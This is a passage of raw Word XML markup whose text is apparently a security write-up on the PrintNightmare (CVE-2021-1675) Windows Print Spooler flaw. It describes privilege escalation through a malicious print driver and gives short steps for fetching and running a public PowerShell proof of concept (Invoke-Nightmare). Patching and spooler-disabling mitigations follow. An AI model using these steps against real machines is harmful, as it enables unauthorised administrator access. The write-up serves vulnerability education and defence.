          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="028AC263">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028AC263">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rintNightmare</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0CAD4869">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60D9F0A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080D8CF">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0D9F0A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2021-1675</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="78369F35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) which</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2DBEB3E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 xml:space="preserve">abuses a set of vulnerabilities in Windows Print Spooler </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0463467D">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3AAB72D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an attacker to escalate their privileges from a</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6A4B2F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low-level</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9470662">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user to Administrator.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="459EBA8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker with a low-privileged local account can install a malicious print </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="459EBA8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>driver</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="459EBA8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to escalate </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="66A64087">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privi</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="66A64087">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">leges </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C521DAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1A58D741" w14:textId="5E240AD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F159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="79F9DCA6" w14:textId="5A7FF94D">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FF159C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DC8BFA6" w:rsidP="0D325B6E" w:rsidRDefault="6DC8BFA6" w14:paraId="4F4B98ED" w14:textId="2EA3D30A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DC8BFA6">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n attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4054C0C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">could </w:t>
      </w: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gain </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 xml:space="preserve">complete control of the machine, allowing them to shut down critical services running on the machine, see sensitive documents stored on it, </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and also</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use</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 xml:space="preserve"> the machine to pivot and attack other machines.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A3C9F9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21853F27" w14:textId="33A37A1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FF159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="546E6CEC" w14:textId="25942EF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FF159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="1DBE81C6" w14:textId="261AB8F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the machine as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FF159C4">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2FF159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="3B05E66D" w14:textId="24BA175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70C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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79EE8028">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Download the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0DDC0485">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79EE8028">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POC </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4525C011">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79EE8028">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hyperlink r:id="R1288bdc769d54002">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="79EE8028">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/calebstewart/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79EE8028">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FF159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="77B7FB92" w14:textId="245781A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1B567FE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Import the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70023305">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cve-2021-1675.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B567FE8" w:rsidP="0D325B6E" w:rsidRDefault="1B567FE8" w14:paraId="60DAACEF" w14:textId="72C7868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567FE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 4: Run Invoke-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B567FE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nightmare</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B567FE8" w:rsidP="0D325B6E" w:rsidRDefault="1B567FE8" w14:paraId="72FA47CD" w14:textId="4A3018A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567FE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 5: Log in as the new user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="27758A9A" w14:textId="77897A6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F159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="1FCEC22E" w14:textId="7F2F3145">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FF159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="29865EC6" w14:textId="65C42B8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FF159C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5B17BB4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the f</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B17BB4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ollowing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A500E97" w:rsidP="0D325B6E" w:rsidRDefault="6A500E97" w14:paraId="2AC3E567" w14:textId="186D9688">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 xml:space="preserve">Apply </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="555FEC74">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at least Microsoft patch KB5004945</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7725804">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mitigating</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67725804">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67725804">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he</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Pr</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ntNi</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gh</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tm</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ar</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A500E97">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17766A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="23D8184B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64816566" w:rsidP="0D325B6E" w:rsidRDefault="64816566" w14:paraId="211E6290" w14:textId="6A7639C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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64816566">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An auto-patching solution can automate the patching process, ensuring all systems are up to date without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B17BB4F" w:rsidP="0D325B6E" w:rsidRDefault="5B17BB4F" w14:paraId="139FC4F9" w14:textId="222289F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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B17BB4F">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rints</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poo</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ler</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EC085E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">should </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be disabled on </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machi</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ne</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 th</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do</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71B50D1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not</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 need </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A0ED603">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>printing access</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71148E72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for attack surface reduction</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A0ED603">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1E4DD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3AC12FB8" w:rsidP="0D325B6E" w:rsidRDefault="3AC12FB8" w14:paraId="4582D18E" w14:textId="33F9E2B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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AC12FB8">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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="113B96B1" w14:textId="3600B130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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2FF159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="752777E3" w14:textId="1BC0A34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59C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85D6661" w:rsidP="0D325B6E" w:rsidRDefault="785D6661" w14:paraId="23A2DDAD" w14:textId="2AB200DA">
      <w:pPr>
